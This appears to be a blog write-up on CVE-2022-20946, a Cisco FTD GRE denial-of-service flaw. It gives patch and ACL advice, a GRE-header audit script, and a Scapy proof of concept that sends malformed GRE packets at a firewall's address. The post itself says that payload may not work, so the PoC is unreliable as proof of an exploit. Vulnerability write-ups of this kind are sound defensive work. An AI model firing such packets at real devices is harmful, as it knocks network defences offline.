If you’re running Cisco Firepower Threat Defense (FTD) Software in your network—and especially if you use GRE tunnels—CVE-2022-20946 is one vulnerability you should know in detail. This is not your everyday bug. This vulnerability lets a remote attacker take your firewall offline, using just a few specially crafted network packets. In this exclusive long-read, we’ll walk through what CVE-2022-20946 is, what makes it dangerous, how it can be exploited (with code snippets), and where to get more details straight from Cisco.
What Is CVE-2022-20946?
CVE-2022-20946 is a Denial-of-Service (DoS) vulnerability found in the way Cisco FTD handles certain Generic Routing Encapsulation (GRE) traffic. When affected versions of FTD process a hand-crafted (malicious) GRE packet, a memory handling bug can crash the box. In the real world, that means an attacker can force your expensive firewall to restart, effectively causing a gap in your network defenses for as long as the reboot takes.
This issue was formally disclosed by Cisco in November 2022 as part of their security advisory bundle, and you can read their original write-up here.
Who’s At Risk?
Anyone using a vulnerable Cisco FTD device and enabling GRE tunnel processing is at risk, especially if the firewall exposes GRE handling to untrusted networks. It only takes one unauthenticated attacker on your network perimeter to trigger the bug.
Check the Cisco advisory for the full matrix of affected software versions.
- Exploit: An attacker crafts a malformed GRE packet and sends it through the firewall.
- Damage: The device hits a memory error and is forced to restart. No need for credentials. No need for a valid GRE tunnel endpoint. Just a malformed GRE packet.
Let’s see what such an attack could look like in code.
Proof of Concept: Sending a Malformed GRE Packet
Here’s a basic Python script using the scapy library to send a GRE packet. With a small tweak, you can craft an out-of-spec payload. The following code is *for educational purposes only.*
Pre-Requisites
- Install Scapy (pip install scapy)
- You need access to a host from which you can send traffic through the targeted Cisco FTD device
```python
from scapy.all import IP, GRE, Raw, send

# IP addresses (change these)
src_ip = '192.0.2.1'
dst_ip = '192.0.2.254'  # FTD's external IP

# This creates a GRE packet with an unusual protocol type and extra payload
malformed_gre = IP(src=src_ip, dst=dst_ip) / GRE(proto=0xFFFF) / Raw(load='A' * 150)

send(malformed_gre, count=5, inter=0.5)
print("[*] Malformed GRE packets sent.")
```
What does this do?
- Repeats five times for reliability
If the targeted FTD device is vulnerable, these packets can trigger the memory handling error, causing the device to crash.
Note:
This PoC is generalized; the actual payload needed to crash your specific model or software version may differ based on Cisco’s internal GRE packet parsing logic (which isn’t open source). Security researchers confirm that subtle tweaks to GRE headers or payload length are usually enough to crash vulnerable devices.
Responsible Disclosure & Fixes
Cisco addressed CVE-2022-20946 in their November 2022 advisory, releasing software updates for affected FTD versions. Their official advisory is here.
1. Update your FTD software to a patched version.
2. Restrict GRE traffic where possible; use access control lists to limit who can send GRE packets at your network boundary.
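One way to audit the GRE that reaches your boundary against the intent of step 2, as an added example (not Cisco's code and not part of the original post). The peer allowlist, the expected protocol types and the sample packets are assumptions constructed for illustration; the checks flag out-of-policy GRE and do not reproduce the specific trigger for CVE-2022-20946, which this page does not specify.

```python
import ipaddress
import struct

# Assumptions, not values from the advisory: the tunnel peers you expect and
# the payload types your tunnels carry (plain RFC 2784/2890 GRE, version 0).
ALLOWED_PEERS = [ipaddress.ip_network("198.51.100.10/32")]
EXPECTED_PROTOS = {0x0800, 0x86DD}  # IPv4 or IPv6 carried inside GRE

def audit_gre(packet: bytes) -> list:
    """Return reasons an IPv4 packet's GRE header is unexpected ([] = fine or not GRE)."""
    if len(packet) < 20 or packet[0] >> 4 != 4 or packet[9] != 47:
        return []  # not IPv4, or IP protocol is not 47 (GRE)
    ihl = (packet[0] & 0x0F) * 4
    src = ipaddress.ip_address(packet[12:16])
    findings = []
    if not any(src in net for net in ALLOWED_PEERS):
        findings.append(f"GRE from non-allowlisted source {src}")
    gre = packet[ihl:]
    if len(gre) < 4:
        return findings + ["truncated GRE header"]
    flags_ver, proto = struct.unpack("!HH", gre[:4])
    if flags_ver & 0x0007:  # version field; RFC 2784 requires 0
        findings.append(f"GRE version {flags_ver & 0x0007}")
    if flags_ver & 0x4FF8:  # bits RFC 2784/2890 leave reserved
        findings.append(f"reserved flag bits set (0x{flags_ver:04x})")
    if proto not in EXPECTED_PROTOS:
        findings.append(f"unexpected protocol type 0x{proto:04x}")
    return findings

def sample_packet(src: str, flags_ver: int, proto: int, payload: bytes = b"") -> bytes:
    """Build a constructed IPv4+GRE packet for the demo (IP checksum left at zero)."""
    gre = struct.pack("!HH", flags_ver, proto) + payload
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(gre), 0, 0, 64, 47, 0,
                       ipaddress.ip_address(src).packed,
                       ipaddress.ip_address("203.0.113.1").packed) + gre

if __name__ == "__main__":
    samples = {  # constructed packets, not captures
        "expected tunnel": sample_packet("198.51.100.10", 0x0000, 0x0800),
        "unknown sender, odd type": sample_packet("192.0.2.1", 0x0000, 0xFFFF, b"A" * 150),
        "reserved bits": sample_packet("198.51.100.10", 0x4000, 0x0800),
    }
    for name, pkt in samples.items():
        print(f"{name}: {audit_gre(pkt) or 'ok'}")
```

If you pass PPTP, its enhanced GRE uses version 1, so relax the version check for those flows instead of treating every hit as hostile.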
Why This Matters
GRE tunnels are old-school, but still very widely used for site-to-site links, VPNs, and network overlays. More critically, many firewalls are configured to pass GRE to support protocols like PPTP and IPsec. If your firewall can be rebooted at will, that opens the door to further attacks, creates service outages, and destroys trust in your network’s infrastructure.
More Reading
- Cisco Official Advisory
- How GRE Works
- Scapy Documentation
Conclusion
CVE-2022-20946 is a reminder that even legacy protocols like GRE can hide critical vulnerabilities in modern firewall platforms. This bug—triggerable by any remote attacker—shows that patching is vital. Check your FTD versions, update if needed, and consider restricting GRE exposures.
Stay safe, stay updated, and remember: even the simplest packet can take down your most expensive defenses!
Timeline
Published on: 11/15/2022 21:15:00 UTC
Last modified on: 11/22/2022 14:48:00 UTC